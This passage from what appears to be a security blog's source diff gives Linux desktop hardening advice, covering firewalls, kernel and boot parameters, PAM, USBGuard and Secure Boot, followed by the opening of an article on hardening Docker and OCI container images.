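# If it prints "Permissive", switch back (and fix the root cause in /etc/selinux/config)
sudo setenforce 1
```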

openSUSE gives the choice of AppArmor or SELinux during the installation process. You should stick to the default for each variant (AppArmor for [Tumbleweed](https://get.opensuse.org/tumbleweed/) and SELinux for [MicroOS](https://microos.opensuse.org/)). openSUSE’s SELinux policies are derived from Fedora.

Arch and Arch-based operating systems often do not come with a mandatory access control system, so you must manually install and configure [AppArmor](https://wiki.archlinux.org/title/AppArmor) yourself.

Note that unlike Android, traditional desktop Linux distributions typically do not have full system Mandatory Access Control policies, and only a few system daemons are actually confined.

### Making Your Own Policies/Profiles

You can make your own AppArmor profiles, SELinux policies, Bubblewrap profiles, and [seccomp](https://en.wikipedia.org/wiki/Seccomp) blacklists to have better confinement of applications. This is an advanced and sometimes tedious task, so I won’t go into detail about how to do it here, but there are a few projects that you could use as reference.

- Whonix’s [AppArmor Everything](https://github.com/Whonix/apparmor-profile-everything)
- Krathalan’s [AppArmor profiles](https://github.com/krathalan/apparmor-profiles)
- noatsecure’s [SELinux templates](https://github.com/noatsecure/hardhat-selinux-templates)
- Seirdy’s [Bubblewrap scripts](https://sr.ht/~seirdy/bwrap-scripts)

### Securing Linux Containers

If you’re running a server, you may have heard of Linux Containers. They are more common in server environments where individual services are built to operate independently. However, you may sometimes see them on desktop systems as well, especially for development purposes.

[Docker](https://en.wikipedia.org/wiki/Docker_(software)) is one of the most common container solutions. It is **not** a proper sandbox, and this means that there is a large kernel attack surface. You should follow the [Docker and OCI Hardening](/posts/apps/docker-and-oci-hardening/) guide to mitigate this problem. In short, there are things you can do like using rootless containers (either through configuration or through using [Podman](https://podman.io/)), using a runtime which provides a pseudo-kernel for each container ([gVisor](https://gvisor.dev/)), and so on.
Another option is [Kata containers](https://katacontainers.io/), where virtual machines masquerade as containers. Each Kata container has its own Linux kernel and is isolated from the host.

## Security Hardening

![opensuse](/images/opensuse.png)

### Umask 077

If you are not using openSUSE, consider changing the default [umask](https://en.wikipedia.org/wiki/Umask) for both regular user accounts and root to 077. Changing umask to 077 can break snapper on openSUSE and is **not** recommended.
The configuration for this varies per distribution, but typically it can be set in `/etc/profile`, `/etc/bashrc`, or `/etc/login.defs`.
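
For example, on distributions that read the value from `/etc/login.defs` (check where your distribution expects it first):

```
# /etc/login.defs
UMASK 077
```

On distributions that use `/etc/profile` or `/etc/bashrc`, appending a plain `umask 077` line achieves the same for login shells.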
Note that unlike on macOS, this will only change the umask for the shell. Files created by running applications will not have their permissions set to 600.

### Firmware Updates

Hardware vendors typically offer updates to Linux systems through the [Linux Vendor Firmware Service](https://fwupd.org/). You can download the updates using the following commands:

```bash
# Update metadata
fwupdmgr refresh

# Download firmware updates and apply them
fwupdmgr update
```

On a typical desktop Linux system, the desktop environment's app store such as `gnome-software`, `discover`, or `snap-store` would integrate with `fwupd` and update your system firmware automatically. However, not all desktop environments/app stores have this integration, so you should check your specific system and set up scheduled update tasks using [systemd timers](https://wiki.archlinux.org/title/systemd/Timers) or [cron](https://wiki.archlinux.org/title/Cron) if needed.

Some distributions like Debian do not have `fwupd` installed by default, so you should check for its existence on your system and install it if needed as well.

Note that `fwupd` supports UEFI updates using the UEFI capsule. This could potentially cause issues if your system gets shut down in the middle of an update. Unless you have USB FlashBack, you should disable this in your UEFI firmware (it is usually called Windows UEFI Firmware Update) or in `/etc/fwupd/uefi_capsule.conf` by adding `uefi` to the end of the `DisabledPlugins` line.

### Firewalls

A [firewall](https://en.wikipedia.org/wiki/Firewall_(computing)) may be used to secure connections to your system.

Red Hat distributions (such as Fedora) are typically configured through [firewalld](https://en.wikipedia.org/wiki/Firewalld). Red Hat has plenty of [documentation](https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/8/html/configuring_and_managing_networking/using-and-configuring-firewalld_configuring-and-managing-networking) regarding this topic. There is also the [Uncomplicated Firewall](https://en.wikipedia.org/wiki/Uncomplicated_Firewall) which can be used as an alternative.

You could also set your default firewall zone to drop packets. If you're on a Red Hat or SUSE based distribution such as Fedora this can be done with the following commands:

```
firewall-cmd --set-default-zone=drop
firewall-cmd --add-protocol=ipv6-icmp --permanent
firewall-cmd --add-service=dhcpv6-client --permanent
```

All these firewalls use the [Netfilter](https://en.wikipedia.org/wiki/Netfilter) framework and therefore cannot protect against malicious programs running on the system. A malicious program could insert its own rules.

There are some per-binary outbound firewalls such as [OpenSnitch](https://github.com/evilsocket/opensnitch) or [Portmaster](https://safing.io/portmaster/) that you could use as well. But just like firewalld and UFW, they are bypassable.

If you are using Flatpak packages, you can revoke their network socket access using Flatseal and prevent those applications from accessing your network. This permission is not bypassable.
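
A sketch of doing the same from the command line (the application ID is hypothetical):

```bash
# Remove network access from a Flatpak app
flatpak override --user --unshare=network org.example.App
```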
If you are using non-classic [Snap](https://en.wikipedia.org/wiki/Snap_(package_manager)) packages on a system with proper snap confinement support (with both AppArmor and [cgroups](https://en.wikipedia.org/wiki/Cgroups) v1 present), you can use the Snap Store to revoke network permission as well. This is also not bypassable.

### Kernel Hardening

There are some additional kernel hardening options such as configuring [sysctl](https://en.wikipedia.org/wiki/Sysctl#Linux) keys and [kernel command-line parameters](https://www.kernel.org/doc/html/latest/admin-guide/kernel-parameters.html) which are described in Madaidan's guide. You should read through them before applying these changes.

- [2.2 Sysctl](https://madaidans-insecurities.github.io/guides/linux-hardening.html#sysctl)
- [2.5.2 Blacklisting kernel modules](https://madaidans-insecurities.github.io/guides/linux-hardening.html#kasr-kernel-modules)

Madaidan recommends that you disable unprivileged [user namespaces](https://madaidans-insecurities.github.io/linux.html#kernel) due to it being responsible for various privilege escalation vulnerabilities. However, some software such as Podman and LXD require unprivileged user namespaces to function. If you decide that you want to use these technologies, do not disable `kernel.unprivileged_userns_clone`.
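
As a small taste of what those sections cover, a sysctl drop-in might look like this. This is an illustrative subset, not a complete or universally safe list; read the guide before adopting any of it:

```
# /etc/sysctl.d/99-hardening.conf (illustrative subset)
kernel.kptr_restrict=2
kernel.dmesg_restrict=1
kernel.unprivileged_bpf_disabled=1
net.core.bpf_jit_harden=2
```

Changes take effect after running `sudo sysctl --system` or rebooting.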

If you are using KickSecure or Whonix, most of this hardening has already been done for you thanks to [security-misc](https://github.com/Kicksecure/security-misc). If you are using Debian, you should consider [morphing](https://www.kicksecure.com/wiki/Debian) it into KickSecure. On other distributions, you can copy the configurations from the following files:

- [`/etc/sysctl.d/30_security-misc.conf`](https://github.com/Kicksecure/security-misc/blob/master/etc/sysctl.d/30_security-misc.conf)
- [`/etc/sysctl.d/30_silent-kernel-printk.conf`](https://github.com/Kicksecure/security-misc/blob/master/etc/sysctl.d/30_silent-kernel-printk.conf)
- [`/etc/modprobe.d/30_security-misc.conf`](https://github.com/Kicksecure/security-misc/blob/master/etc/modprobe.d/30_security-misc.conf)

Note that these configurations do not disable unprivileged user namespaces. There are also a few things in `/etc/modprobe.d/30_security-misc.conf` to keep in mind:

- The `bluetooth` and `btusb` kernel modules are disabled by default. You need to comment out `install bluetooth /bin/disabled-bluetooth-by-security-misc` and `install btusb /bin/disabled-bluetooth-by-security-misc` if you want to use Bluetooth.
- Apple filesystems are disabled by default. This is generally fine on non-Apple systems; however, if you are using Linux on an Apple product, you **must** check what filesystem your EFI partition uses. For example, if your EFI filesystem is HFS+, you need to comment out `install hfsplus /bin/disabled-filesys-by-security-misc`, otherwise your computer will not be able to boot into Linux.

### Hardening Boot Parameters

Read through this section on how to harden your boot parameters:

- [2.3 Boot Parameters](https://madaidans-insecurities.github.io/guides/linux-hardening.html#boot-parameters)

Kicksecure comes with these boot parameters by default. This section is fairly short, so I'd recommend that you read it through. With that being said, here are all of the parameters that you would need:

```
slab_nomerge init_on_alloc=1 init_on_free=1 page_alloc.shuffle=1 pti=on vsyscall=none debugfs=off oops=panic module.sig_enforce=1 lockdown=confidentiality mce=0 quiet loglevel=0 spectre_v2=on spec_store_bypass_disable=on tsx=off tsx_async_abort=full,nosmt mds=full,nosmt l1tf=full,force nosmt=force kvm.nx_huge_pages=force randomize_kstack_offset=on
```

Note that [SMT](https://en.wikipedia.org/wiki/Simultaneous_multithreading) is disabled due to it being the cause of various security vulnerabilities. Also, on rpm-ostree based distributions, you should set the kernel parameters using `rpm-ostree kargs` rather than messing with GRUB configurations directly.
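
For example, to append one of the parameters above (repeat `--append` for the rest):

```bash
# Append a kernel argument to the next deployment on an rpm-ostree system
sudo rpm-ostree kargs --append="slab_nomerge"
```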

### Restricting access to /proc and /sys

You should read these 2 sections in Madaidan's guide to further reduce the attack surface on the kernel:

- [2.4 hidepid](https://madaidans-insecurities.github.io/guides/linux-hardening.html#hidepid)
- [2.7 Restricting access to sysfs](https://madaidans-insecurities.github.io/guides/linux-hardening.html#restricting-sysfs)

Disabling access to `/sys` without a proper whitelist will lead to various applications breaking. This will unfortunately be an extremely tedious process for most users. Kicksecure, and by extension, Whonix, has the experimental [proc-hidepid](https://github.com/Kicksecure/security-misc/blob/master/lib/systemd/system/proc-hidepid.service) and [hide-hardware-info](https://github.com/Kicksecure/security-misc/blob/master/lib/systemd/system/hide-hardware-info.service) services which do just this. From my testing, these work perfectly fine on minimal Kicksecure installations and both Qubes-Whonix Workstation and Gateway.

### linux-hardened

Some distributions like Arch Linux have the [linux-hardened](https://github.com/anthraxx/linux-hardened) kernel package. It includes [hardening patches](https://wiki.archlinux.org/title/security#Kernel_hardening) and more security-conscious defaults.

linux-hardened sets `kernel.unprivileged_userns_clone=0` by default as well. See the [note above](#kernel-hardening) about how this might impact you.

### Linux Kernel Runtime Guard (LKRG)

LKRG is a kernel module that performs runtime integrity check on the kernel to help detect exploits against the kernel. LKRG works in a *post*-detect fashion, attempting to respond to unauthorized modifications to the running Linux kernel. While it is [bypassable by design](https://lkrg.org/), it does stop off-the-shelf malware that does not specifically target LKRG itself. This may make exploits harder to develop and execute on vulnerable systems.

If you can get LKRG and maintain module updates, it provides a worthwhile improvement to security. Debian-based distributions can get the LKRG DKMS package from KickSecure's repository and the [KickSecure documentation](https://www.kicksecure.com/wiki/Linux_Kernel_Runtime_Guard_LKRG) has installation instructions. Once again, if you are using Debian, consider [morphing](https://www.kicksecure.com/wiki/Debian) it into KickSecure. It should be noted that KickSecure does not currently install LKRG by default, and you will need to run `sudo apt install lkrg-dkms linux-headers-amd64` to obtain it.

On Fedora, [fepitre](https://github.com/fepitre), a QubesOS developer, has a [COPR repository](https://copr.fedorainfracloud.org/coprs/fepitre/lkrg/) where you can install it. Arch based systems can obtain the LKRG DKMS package via an [AUR package](https://aur.archlinux.org/packages/lkrg-dkms).

### grsecurity

grsecurity is a set of kernel patches that attempt to improve security of the Linux kernel. It requires [payment to access](https://grsecurity.net/purchase) the code and is worth using if you have a subscription.

### Disabling Simultaneous Multithreading (SMT)

[SMT](https://en.wikipedia.org/wiki/Simultaneous_multithreading) has been the cause of numerous hardware vulnerabilities, and subsequent patches for those vulnerabilities often come with performance penalties that negate a lot of the performance gain given by SMT. If you followed the “Hardening Boot Parameters” section above, some kernel parameters already disable SMT. If the option is available to you, I recommend that you disable it in your firmware as well.

### Hardened Memory Allocator

The [hardened memory allocator](https://github.com/GrapheneOS/hardened_malloc) from [GrapheneOS](https://grapheneos.org) can also be used on general Linux distributions. It is available as an [AUR package](https://wiki.archlinux.org/title/Security#Hardened_malloc) on Arch based distributions, and (though not enabled by default) on Whonix and Kicksecure.

On Fedora, there is currently a build for it by Divested Computing Group that you can find [here](https://github.com/divestedcg/rpm-hardened_malloc).

If you are using Whonix, Kicksecure or have Hardened_Malloc installed somewhere, consider setting up `LD_PRELOAD` as described in the [Kicksecure Documentation](https://www.kicksecure.com/wiki/Hardened_Malloc) or [Arch Wiki](https://wiki.archlinux.org/title/Security#Hardened_malloc).

### Mountpoint Hardening

Consider adding the [following options](https://man7.org/linux/man-pages/man8/mount.8.html) `nodev`, `noexec`, and `nosuid` to mountpoints which do not need them. Typically, these could be applied to `/boot`, `/boot/efi`, and `/var`.

These flags could also be applied to `/home` and `/root` as well; however, `noexec` will prevent applications that require binary execution in those locations from working. This includes products such as Flatpak and Snap. It should also be noted that this is not foolproof, as `noexec` is bypassable. You can see an example of that [here](https://chromium.googlesource.com/chromiumos/docs/+/HEAD/security/noexec_shell_scripts.md).
If you use [Toolbox](https://docs.fedoraproject.org/en-US/fedora-silverblue/toolbox/), you should not set any of those options on `/var/log/journal`. From my testing, the Toolbox container will fail to start if you have `nodev`, `nosuid`, or `noexec` on said directory. If you are on Arch Linux, you probably would not want to set `noexec` on `/var/tmp`, as it will make some AUR packages fail to build.
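
A sketch of what such entries might look like in `/etc/fstab` (the UUIDs are placeholders for your own):

```
# /etc/fstab (illustrative entries; substitute your own UUIDs)
UUID=<boot-uuid>  /boot      ext4  defaults,nodev,nosuid,noexec  0 2
UUID=<efi-uuid>   /boot/efi  vfat  defaults,nodev,nosuid,noexec  0 2
```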

### Disabling SUID

SUID allows a user to execute an application as the owner of that application, which in many cases, would be the `root` user. Vulnerable SUID executables could lead to privilege escalation vulnerabilities.

It is desirable to remove SUID from as many binaries as possible; however, this takes substantial effort and trial and error on the user's part, as some applications require SUID to function.
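
To see what you are dealing with, you can enumerate SUID/SGID binaries first; the binary in the second command is hypothetical:

```bash
# List SUID and SGID files on the root filesystem
sudo find / -xdev -type f \( -perm -4000 -o -perm -2000 \) -ls

# Remove the SUID bit from a binary you have determined does not need it
sudo chmod u-s /usr/bin/example
```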

Kicksecure, and by extension, Whonix has an experimental [permission hardening service](https://github.com/Kicksecure/security-misc/blob/master/lib/systemd/system/permission-hardening.service) and [application whitelist](https://github.com/Kicksecure/security-misc/tree/master/etc/permission-hardening.d) to automate SUID removal from most binaries and libraries on the system. From my testing, these work perfectly fine on a minimal Kicksecure installation and both Qubes-Whonix Workstation and Gateway.

If you are using Kicksecure or Whonix, consider enabling the `permission-hardening` service.

### Securing Time Synchronization

Most Linux distributions by default (especially distributions with `systemd-timesyncd`) use NTP for time synchronization, which is unencrypted and unauthenticated. There are two ways to easily solve this problem:

- [Configure NTS with chronyd](https://fedoramagazine.org/secure-ntp-with-nts/)
- Use [sdwdate](https://github.com/Kicksecure/sdwdate) on Debian based distributions.

If you decide on using NTS with chronyd, consider using multiple different sources to synchronize your time with, and require at least half or more of those sources to agree before the time on your system is actually changed.
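
A minimal sketch of such a `chrony.conf`, assuming these particular NTS-capable servers (the GrapheneOS configuration linked below is a more complete reference):

```
# /etc/chrony.conf (minimal sketch)
server time.cloudflare.com iburst nts
server ptbtime1.ptb.de iburst nts

# Require agreement from at least 2 sources before adjusting the clock
minsources 2
```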
[GrapheneOS](https://grapheneos.org) actually uses a quite nice configuration for this with their infrastructure. I recommend that you replicate their [`chrony.conf`](https://github.com/GrapheneOS/infrastructure/blob/main/chrony.conf) on your system.

### Linux Pluggable Authentication Modules (PAM)

The security of [PAM](https://en.wikipedia.org/wiki/Linux_PAM) can be [hardened](https://madaidans-insecurities.github.io/guides/linux-hardening.html#pam) to allow secure authentication to your system.

On Red Hat distributions you can use [`authselect`](https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/8/html/configuring_authentication_and_authorization_in_rhel/configuring-user-authentication-using-authselect_configuring-authentication-and-authorization-in-rhel) to configure this e.g.:

```bash
sudo authselect select <profile_id, default: sssd> with-faillock without-nullok with-pamaccess
```
On systems where [`pam_faillock`](https://man7.org/linux/man-pages/man8/pam_tally.8.html) is not available, consider using [`pam_tally2`](https://man7.org/linux/man-pages/man8/pam_tally.8.html) instead.
If you have a Yubikey, you can also use the `pam_u2f` module to require second factor authentication for your login. Follow the [Arch Wiki](https://wiki.archlinux.org/title/Universal_2nd_Factor) documentation for this. Note that you **must** set a non-transient hostname before setting this up, as you will not be able to login when your hostname changes.
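
Once `pam_u2f` is installed and your key is registered per the Arch Wiki guide, the relevant PAM line looks something like this (the file path and stack placement vary by distribution; keep a working session open while testing so you don't lock yourself out):

```
# /etc/pam.d/system-auth (path varies by distribution)
auth required pam_u2f.so cue
```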

### Storage Media Handling

Most Linux distributions automatically mount arbitrary filesystems from storage media plugged into the computer. This is a security risk, as an adversary can attach a malicious storage device to your computer to exploit vulnerable filesystem drivers.

**udisks**

On systems which use `udisks` for automounting and `GNOME`/`Cinnamon` as their desktop environment (along with `Nautilus`/`Nemo` as the file manager), you can mitigate this risk by running the following commands:

```bash
echo "[org/gnome/desktop/media-handling]
automount=false
automount-open=false" | sudo tee /etc/dconf/db/local.d/custom

sudo dconf update
```

This will set the default `dconf` settings for new users and override all `dconf` settings for existing users. Note that this can be overridden by regular users on your system, simply by changing their individual `dconf` settings.

**autofs**

On older systems where `autofs` is used, you should mask the `autofs` service to disable this behavior.
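
For example, on a systemd-based system:

```bash
# Prevent the autofs service from being started
sudo systemctl mask autofs
```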

**Whonix**

On Whonix, you generally do not need to worry about this behavior since it is disabled by default.

### USB Port Protection

To better protect your [USB](https://en.wikipedia.org/wiki/USB) ports from attacks such as [BadUSB](https://en.wikipedia.org/wiki/BadUSB), I recommend [USBGuard](https://github.com/USBGuard/usbguard). USBGuard has [documentation](https://github.com/USBGuard/usbguard#documentation) as does the [Arch Wiki](https://wiki.archlinux.org/title/USBGuard).
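
A minimal sketch of getting started (generate a policy that allows currently attached devices, then enable the daemon):

```bash
# Generate a base policy from the devices currently connected
sudo sh -c 'usbguard generate-policy > /etc/usbguard/rules.conf'

# Enable and start the daemon
sudo systemctl enable --now usbguard
```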
Another alternative option if you’re using the [linux-hardened](#linux-hardened) is the [`deny_new_usb`](https://github.com/GrapheneOS/linux-hardened/commit/96dc427ab60d28129b36362e1577b6673b0ba5c4) sysctl. See [Preventing USB Attacks with `linux-hardened`](https://blog.lizzie.io/preventing-usb-attacks-with-linux-hardened.html).

## Secure Boot

[Secure Boot](https://en.wikipedia.org/wiki/Unified_Extensible_Firmware_Interface#Secure_Boot) can be used to secure the boot process by preventing the loading of [unsigned](https://en.wikipedia.org/wiki/Public-key_cryptography) [UEFI](https://en.wikipedia.org/wiki/Unified_Extensible_Firmware_Interface) drivers or [boot loaders](https://en.wikipedia.org/wiki/Bootloader).

One of the problems with Secure Boot, particularly on Linux, is that only the chainloader (shim), the [boot loader](https://en.wikipedia.org/wiki/Bootloader) (GRUB), and the [kernel](https://en.wikipedia.org/wiki/Kernel_(operating_system)) are verified, and that's where verification stops. The [initramfs](https://en.wikipedia.org/wiki/Initial_ramdisk) is often left unverified and unencrypted, opening up the window for an [evil maid](https://en.wikipedia.org/wiki/Evil_maid_attack) attack. The firmware on most devices is also configured to trust Microsoft's keys for Windows and its partners, leading to a large attack surface.

To eliminate the need to trust Microsoft's keys, either follow the "Using your own keys" section on the [Arch Wiki](https://wiki.archlinux.org/title/Unified_Extensible_Firmware_Interface/Secure_Boot) or use [sbctl](https://github.com/Foxboron/sbctl). The important thing that needs to be done here is to replace the OEM's key with your own Platform Key.
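
With sbctl, this roughly looks like the following; it is a sketch, so read the sbctl documentation before running it, and note that enrolling keys requires the firmware to be in setup mode:

```bash
# Create your own Secure Boot keys
sudo sbctl create-keys

# Enroll them into the firmware (firmware must be in setup mode)
sudo sbctl enroll-keys

# Sign your boot chain, then verify (the path is an example)
sudo sbctl sign -s /boot/EFI/BOOT/BOOTX64.EFI
sudo sbctl verify
```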

There are several ways to work around the unverified initramfs:

### Encrypted /boot

The first way is to [encrypt the /boot partition](https://wiki.archlinux.org/title/GRUB#Encrypted_/boot). If you are on Fedora Workstation (not Silverblue), you can follow [this guide](https://mutschler.dev/linux/fedora-btrfs-33/) to convert the existing installation to encrypted `/boot`. openSUSE comes with this by default.
Encrypting `/boot`, however, has its own issues, one being that [GRUB](https://en.wikipedia.org/wiki/GNU_GRUB) does not support LUKS2 well, so you will most likely need to fall back to the old LUKS1 encryption scheme. In particular, GRUB only supports PBKDF2 key derivation, not Argon2 (the default with LUKS2). The `grub-install` command, from my own testing, also seems to have trouble detecting LUKS2 volumes, while it works just fine with LUKS1 volumes. Another problem with encrypted `/boot` is that you have to type the encryption password twice, though that can be solved by following the [openSUSE Wiki](https://en.opensuse.org/SDB:Encrypted_root_file_system#Avoiding_to_type_the_passphrase_twice).

There are a few options depending on your configuration:

- If you enroll your own keys as described above, and your distribution supports Secure Boot by default, you can add your distribution's EFI key to the list of trusted keys (db keys). It can then be enrolled into the firmware. Then, you should move all of your keys off your local storage device.
- If you enroll your own keys as described above, and your distribution does **not** support Secure Boot out of the box (like Arch Linux), you have to leave the keys on the disk and set up automatic signing of the [kernel](https://wiki.archlinux.org/title/Unified_Extensible_Firmware_Interface/Secure_Boot#Signing_the_kernel_with_a_pacman_hook) and bootloader. If you are using GRUB, you can install it with the `--no-shim-lock` option and remove the need for the chainloader.

### Unified Kernel Image

The second option is to create a [Unified Kernel Image](https://wiki.archlinux.org/title/Unified_kernel_image) that contains the kernel, [initramfs](https://en.wikipedia.org/wiki/Initial_ramdisk), and [microcode](https://en.wikipedia.org/wiki/Microcode). This EFI stub can then be signed. I recommend using [sbctl](https://github.com/Foxboron/sbctl) to generate such an EFI image. This option also requires you to leave the keys on the disk to set up automatic signing, which weakens the security model.

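For illustration, such an image can also be assembled by hand with `objcopy` and the systemd EFI stub before signing it (a sketch; the file paths are assumptions based on a typical Arch Linux setup):

```bash
objcopy \
    --add-section .osrel=/etc/os-release --change-section-vma .osrel=0x20000 \
    --add-section .cmdline=/etc/kernel/cmdline --change-section-vma .cmdline=0x30000 \
    --add-section .linux=/boot/vmlinuz-linux --change-section-vma .linux=0x2000000 \
    --add-section .initrd=/boot/initramfs-linux.img --change-section-vma .initrd=0x3000000 \
    /usr/lib/systemd/boot/efi/linuxx64.efi.stub /boot/EFI/Linux/linux.efi

# Sign the resulting unified image with your own keys
sudo sbctl sign /boot/EFI/Linux/linux.efi
```
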
### Notes

After setting up Secure Boot, it is crucial that you set a “firmware password” (also called a “supervisor password”, “BIOS password” or “UEFI password”); otherwise, an adversary can simply disable Secure Boot.

These recommendations can make you a little more resistant to [evil maid](https://en.wikipedia.org/wiki/Evil_maid_attack) attacks, but they are not as good as a proper verified boot process such as that found on [Android](https://source.android.com/security/verifiedboot), [ChromeOS](https://support.google.com/chromebook/answer/3438631) or [Windows](https://docs.microsoft.com/en-us/windows/security/information-protection/secure-the-windows-10-boot-process).

258
content/posts/linux/Docker and OCI Hardening.md
Normal file

@ -0,0 +1,258 @@

---
title: "Docker and OCI Hardening"
date: 2022-03-30T21:23:12Z
tags: ['Applications', 'Linux', 'Container', 'Security']
author: Wonderfall
canonicalURL: https://wonderfall.dev/docker-hardening/
ShowCanonicalLink: true
---

Containers aren't that fancy new thing anymore, but they were a big deal. And they still are. They are a concrete solution to the following problem:

> \- Hey, your software doesn't work...
>
> \- Sorry, it works on my computer! Can't help you.

Whether we like them or not, containers are here to stay. Their expressiveness and semantics allow for an abstraction of the OS dependencies that software has, the latter being often dynamically linked against certain libraries. The developer can therefore provide a known-good environment where it is expected that their software "just works". That is particularly useful for development to eliminate environment-related issues, and it is often used in production as well.

Containers are often perceived as a great tool for isolation, that is, they can provide an isolated workspace that won't pollute your host OS - all that without the overhead of virtual machines. Security-wise: containers, as we know them on Linux, are glorified namespaces at their core. Containers usually share the same kernel with the host, and **namespaces** is the kernel feature for separating kernel resources across containers (IDs, networks, filesystems, IPC, etc.). Containers also leverage the features of **cgroups** to separate system resources (CPU, memory, etc.), and security features such as seccomp to restrict syscalls, or MACs (AppArmor, SELinux).

At first, it seems that containers may not provide the same isolation boundary as virtual machines. That's fine, they were not designed to. But they can't be reduced to a simple `chroot` either. We'll see that a "container" can mean a lot of things, and their definition may vary a lot depending on the implementation: as such, containers are mostly defined by their semantics.

## Docker is dead, long live Docker... and OCI!

When people think of containers, a large group of them may think of Docker. While Docker played a big role in the popularity of containers a few years ago, it didn't introduce the technology: on Linux, LXC did (*Linux Containers*). In fact, Docker in its early days was a high-level wrapper for LXC, which already combined the power of namespaces and cgroups. Docker then replaced LXC with `libcontainer`, which does more or less the same, plus extra features.

Then, what happened? *Open Container Initiative* (OCI). That is the current standard that defines the container ecosystem. That means that whether you're using Docker, Podman, or Kubernetes, you're in fact running OCI-compliant tools. That is a good thing, as it saves a lot of interoperability headaches.

**Docker** is no longer the monolithic platform it once was. `libcontainer` was absorbed by `runc`, the reference OCI runtime. The high-level components of Docker split into different parts related to the upstream Moby project (Docker is the "assembled product" of the "Moby components"). When we refer to Docker, we in fact refer to this powerful high-level API that manages OCI containers. By design, Docker is a daemon that communicates with `containerd`, a lower-level layer, which in turn communicates with the OCI runtime. That also means that you could very well skip Docker altogether and use `containerd` or even `runc` directly.

```
Docker client <=> Docker daemon <=> containerd <=> containerd-shim <=> runc
```

**Podman** is an alternative to Docker developed by Red Hat that also intends to be a drop-in replacement for Docker. It doesn't work with a daemon, and can work rootless by design (Docker has support for rootless too, but not without caveats). I would largely recommend Podman over Docker for someone who wants a simple tool to run containers and test code on their machine.

**Kubernetes** (also known as K8s) is the container platform made by Google. It is designed with scaling in mind, and is about running containers across a cluster, whereas Docker focuses on packaging containers on a single node. Docker Swarm is the direct alternative to that, but it has never really taken off due to the popularity of K8s.

For the rest of this article, we will use Docker as the reference for our examples, along with the [Compose specification](https://docs.docker.com/compose/compose-file/) format. Most of these examples can be adapted to other platforms without issues.

## The nightmare of dependencies

Containers are made from images, and images are typically built from a Dockerfile. Images can be built and distributed through OCI registries: [Docker Hub](https://hub.docker.com/), [Google Container Registry](https://cloud.google.com/container-registry), [GitHub Container Registry](https://docs.github.com/en/packages/working-with-a-github-packages-registry/working-with-the-container-registry), and so on. You can also set up your own private registry, but the reality is that people often pull images from these public registries.

### Images, immutability and versioning

Images are what make containers, well, containers. Containers made from the same image should behave similarly on different machines. Images can have **tags**, which are useful for software versioning. The usage of generic tags such as `latest` is often discouraged because it defeats the purpose of the expected behavior of the container. Tags are not necessarily immutable by design, and they shouldn't be (more on that below). A **digest**, however, is the attribute of an immutable image, and is often generated with the SHA-256 algorithm.

```
docker.io/library/golang:1.17.1@sha256:232a180dbcbcfa7250917507f3827d88a9ae89bb1cdd8fe3ac4db7b764ebb25
    ^               ^       ^                ^
    |               |       |                |
 Registry         Image    Tag       Digest (immutable)
```

Now onto why tags shouldn't be immutable: as written above, containers bring us an abstraction over the OS dependencies that are used by the packaged software. That is nice indeed, but this shouldn't lure us into believing that we can forget security updates. The fact is, **there is still a whole OS to care about**, and we can't just think of the container as a simple package tool for software.

For these reasons, good practices were established:

- An image should be as minimal as possible (Alpine Linux, or scratch/distroless).
- An image, with a given tag, should be regularly built, without cache to ensure all layers are freshly built.
- An image should be rebuilt when the images it's based on are updated.

### A minimal base system

[Alpine Linux](https://alpinelinux.org/) is often the choice for official images for the first reason. This is not a typical Linux distribution as it uses musl as its C library, but it works quite well. Actually, I'm quite fond of Alpine Linux and `apk` (its package manager). If a supervision suite is needed, I'd look into `s6`. If you need a glibc distribution, Debian provides slim variants for lightweight base images. We can do even better than using Alpine by using **distroless images**, allowing us to have state-of-the-art application containers.

"Distroless" is a fancy name referring to an image with a minimal set of dependencies, from none (for fully static binaries) to some common libraries (typically the C library). Google maintains [distroless images](https://github.com/GoogleContainerTools/distroless) you can use as a base for your own images. If you were wondering, the difference with `scratch` (empty starting point) is that distroless images contain common dependencies that "almost-statically compiled" binaries may need, such as `ca-certificates`.

However, distroless images are not suited for every application. In my experience though, distroless is an excellent option with pure Go binaries. Going with minimal images drastically reduces the available attack surface in the container. For example, here's a [multi-stage Dockerfile](https://docs.docker.com/develop/develop-images/multistage-build/) resulting in a minimal non-root image for a simple Go project:

```Dockerfile
# Build stage: compile a static binary
FROM golang:alpine as build
WORKDIR /app
COPY . .
RUN CGO_ENABLED=0 go build -o /my_app ./cmd/my_app

# Final stage: minimal distroless image, running as non-root
FROM gcr.io/distroless/static
COPY --from=build /my_app /
USER nobody
ENTRYPOINT ["/my_app"]
```

The main drawback of using minimal images is the lack of tools that help with debugging, which also constitute the very attack surface we're trying to get rid of. The trade-off is probably not worth the hassle for development-focused containers, and if you're running such images in production, you have to be confident enough to operate with them. Note that the `gcr.io/distroless` images have a `:debug` tag to help in that regard.

### Keeping images up-to-date

The two other points are highly problematic, because most software vendors just publish an image on release and forget about it. You should take it up with them if you're running images that are versioned but not regularly updated. I'd say running scheduled builds **once a week** is the bare minimum to make sure dependencies stay up-to-date. Alpine Linux is a better choice than most other "stable" distributions because it usually has more recent packages.

Stable distributions often rely on backporting security fixes from CVEs, which is known to be a flawed approach to security since CVEs aren't always assigned or even taken care of. Alpine has more recent packages, and it has versioning, so it's once again a particularly good choice as long as `musl` doesn't cause issues.

### Is it really a security nightmare?

When people say Docker is a security nightmare because of that, that's a fair point. On a traditional system, you could upgrade your whole system with a single command or two. With Docker, you'll have to recreate several containers... if the images were kept up-to-date in the first place. Recreating containers is not a big deal actually: hot upgrades of binaries and libraries often require the services that use them to restart, otherwise they could still be using an old (and vulnerable) version in memory. But yeah, the fact is most people are running outdated containers, and more often than not, they don't have the choice if they rely on third-party images.

[Trivy](https://github.com/aquasecurity/trivy) is an excellent tool to scan images for a subset of **known vulnerabilities** an image might have. You should play with it and see for yourself how outdated many publicly available images are.

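For instance, scanning an image is a one-liner (the image name is just an example):

```
trivy image python:3.9-alpine
```
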
### Supply-chain attacks

As with any code downloaded from a software vendor, OCI images are not exempt from supply-chain attacks. The good practice is quite simple: rely on official images, and ideally build and maintain your own images. One should definitely not automatically trust random third-party images found on Docker Hub. Half of these images, if not more, contain vulnerabilities, and I bet a good portion of them contain malware [such as miners](https://www.trendmicro.com/vinfo/fr/security/news/virtualization-and-cloud/malicious-docker-hub-container-images-cryptocurrency-mining) or worse.

